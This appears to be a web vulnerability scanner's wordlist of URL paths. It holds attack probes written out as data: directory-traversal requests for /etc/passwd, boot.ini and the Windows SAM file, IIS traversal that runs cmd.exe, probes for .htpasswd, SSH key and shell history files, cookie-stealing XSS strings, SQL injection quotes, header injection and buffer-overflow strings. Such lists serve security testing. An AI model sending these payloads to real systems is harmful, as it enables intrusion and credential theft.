/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir+c:\\
/./
/./../mpweb.ini
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../boot.ini
/./cgi-bin//test%20cgi
/./WEB-INF/
/./webadmin.nsf
/./winnt/system32/cmd.exe?/c+dir/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/.access
/.acf
/.addressbook
/.adm
/.adm/
/.admin
/.admin/
/.aspx
/.bashrc
/.bash_history
/.box/../winnt/win.ini
/.cfm
/.cgi-bin
/.cobalt/
/.cobalt/.cobalt/siteUserMod/siteUserMod.cgi
/.cobalt/alert/service.cgi?service=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/.cobalt/siteUserMod.cgi
/.cobalt/siteUserMod/siteUserMod.cgi
/.cobalt/sysManage/../../../../../../../../../../../../etc/passwd
/.cobalt/sysManage/../../../../../../etc/passwd
/.cobalt/sysManage/../admin/.htaccess
/.DS_Store
/.FBCIndex
/.FBCSemaphoreFile
/.forward
/.history
/.htaccess
/.HTACCESS.
/.htaccess.old
/.htaccess/
/.htaccess~
/.html/............../config.sys
/.htpasswd
/.htpasswd-girls
/.htpasswd-members
/.htpasswd.old
/.htpasswd/
/.htpasswd//th1s1sns74lk3r404which1224703692.html
/.htpasswd~
/.htpasswrd
/.icons
/.index
/.iwestpass
/.jpilot
/.jpilot/
/.jsp
/.jsp/WEB-INF/classes/Env.java
/.login1.asp
/.lynx_cookies
/.members
/.meta/
/.mysql_history
/.ns4/../winnt/win.ini
/.nsconfig
/.nsf%00.nsf/../lotus/domino/notes.ini
/.nsf%00.nsf/../winnt/win.ini
/.nsf.nsf/..//lotus/domino/notes.ini
/.nsf.nsf/..//winnt/win.ini
/.nsf.nsf//../lotus/domino/notes.ini
/.nsf.nsf//../winnt/win.ini
/.nsf/..///lotus/domino/notes.ini
/.nsf/..///winnt/win.ini
/.nsf/..//lotus/domino/notes.ini
/.nsf/..//winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/.nsf/../notes.ini
/.nsf/../winnt/win.ini
/.nsf//..//lotus/domino/notes.ini
/.nsf//..//winnt/win.ini
/.nsf//../lotus/domino/notes.ini
/.nsf//../winnt/win.ini
/.nsf///../lotus/domino/notes.ini
/.nsf///../winnt/win.ini
/.pass
/.passes
/.passwd
/.password
/.passwords
/.passwrd
/.perf
/.photon/
/.pinerc
/.plan
/.printer
/.proclog
/.procmailrc
/.profile
/.psql_history
/.pwd
/.rhosts
/.secure/
/.shtm
/.shtml
/.sh_history
/.sploits/
/.ssh
/.ssh/authorized_keys
/.ssh/known_hosts
/.stm
/.Templates/
/.thtml
/.userid.pwd
/.users
/.usersdb
/.web/
/.wwwacl
/.www_acl
/.\/./cg%69-bin/./test%20cgi
//
//%22%3e%3cscript%3ealert(xss)%3c/script%3e
//%3cimg%20src%3d%22javascript%3aalert(xss)%22%3e
//.jsp/WEB-INF/classes/Env.java
///
////
////./../.../boot.ini
////////////
/////////////
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////...
////CON
///etc/hosts
///etc/passwd
///_vti_inf.html
//?>'"><script>alert(xss)</script>
//a.idq?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
//admin/admin.shtml
//aux%00
//aux%00.jsp
//icons/
//NoneExistent%0d%0aInjectedHeadernjectedValue
//NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
//PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
//Scripts/tools 
//Sites/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
//Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
//Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp?file=index.asp
//Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp?file=index.asp
//Sites/Samples/Knowledge/Push/ViewCode.asp?file=index.asp
//Sites/Samples/Knowledge/Search/ViewCode.asp?file=index.asp
//siteserver/publishing/viewcode.asp?file=index.asp
//WEB-INF
//WEB-INF/
/0/
/1,1&url=bla&title=bla
/1/
/1223618186/
/123%0a%0a%3ealert(xss)%3b%3c/script%3e123.jsp
/126471964
/14all-1.1.cgi
/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
/14all.cgi?cfg=../../../../../../../../etc/passwd
/1929090552.old
/2/
/2006/
/2007/
/2008/
/2600-cgi/ezmlm-cgi
/2bgal/disp_album.php?id_album='
/2bgal/disp_album.php?id_album=1'
/3/
/364332/
/367850337.idc
/4/
/4830ed7a44601aca8488617f4b313ba4
/4DBin/_/../../../../../../../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/C:/winnt/repair/sam._
/5/
/6/
/666%0a%0a666.jsp
/7/
/705495126.plx
/8/
/852566C90012664F
/857583/
/874840/
/9/
/999'
/:/x.jsp
/</index.jsp
/<oot.ini
/<script>alert("CSS");</script>
/<script>alert('CSS')</script>
/<script>alert('TRACE');</script>
/<script>alert('Vulnerable')</script>.jsp
/<script>alert('Vulnerable')</script>.shtm
/<script>alert('Vulnerable')</script>.shtml
/<script>alert('Vulnerable')</script>.stm
/<script>alert('Vulnerable')</script>.thtml
/<script>alert('XSS')</script>
/<script>alert('XSS')</script>.jsp
/<SCRIPT>alert('Your+log+viewing+software+is+vulnerable+to+cross+site+scripting+attacks.')</SCRIPT>
/<script>alert(document.domain)</script>
/<script>alert(xss);</script>.cfm
/<script>alert(xss)</script>
/<script>alert(xss)</script>.cfm
/<script>alert(xss)</script>.cfml
/<script>alert(xss)</script>.shtml
/<script>alert(xss)</script>.stm
/>+ACJ-+AD4APB-SCRIPT/TYPE=TEXT/VBSCRIPT+AD7-MSGBOX(xss)+AA0APB-/SCRIPT+AD7-
/>/index.jsp
/>/nonexistent.jsp
/>/noSuchFile.jsp
/?%3E%27%22%3E%3Cscript%3Ealert%2810826%29%3C%2Fscript%3E=123
/?%3E%27%22%3E%3Cscript%3Ealert%2810830%29%3C%2Fscript%3E=123
/?=>"'><ScRiPt>alert(xss)</ScRiPt>
/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
/?>"'><ScRiPt>alert(xss)</ScRiPt>
/?>'"><script>alert(xss)</script>
/?><script>alert('XSS');</1436098301/
/?><script>alert('XSS');</script>
/?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/?act=SR&f='><script>alert(document.cookie)</script>
/?action=viewgallery&type=album&aid=&page=-1%27
/?archive&ctg=%27
/?c='><script>alert(document.cookie)</script>
/?D=A
/?feed=rss2&p=11%27
/?foo=too&hop=&gazon=zz
/?gallery=gallery/includes/admin.class.php
/?ilang=eng&SID=&%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/?ilang=eng&SID=2%22%3Cscript%3Ealert(xss);%3C/script%3E
/?lng=<script>alert(document.cookie);</script>
/?M=A
/?N=D
/?Open
/?OpenServer
/?order_num=abcd&payment=%22>&lt;script&gt;alert(xss)&lt;/script&gt;&send=first&send=regular&send=priority&send=express
/?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/?page=/../../../../../../../../boot.ini%00
/?page=/../../../../../../../../etc/passwd%00
/?page=/../../../../../../../../winnt/win.ini%00
/?page=shop%2Fflypage&product_id=-3%27
/?pageid=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/?PageServices
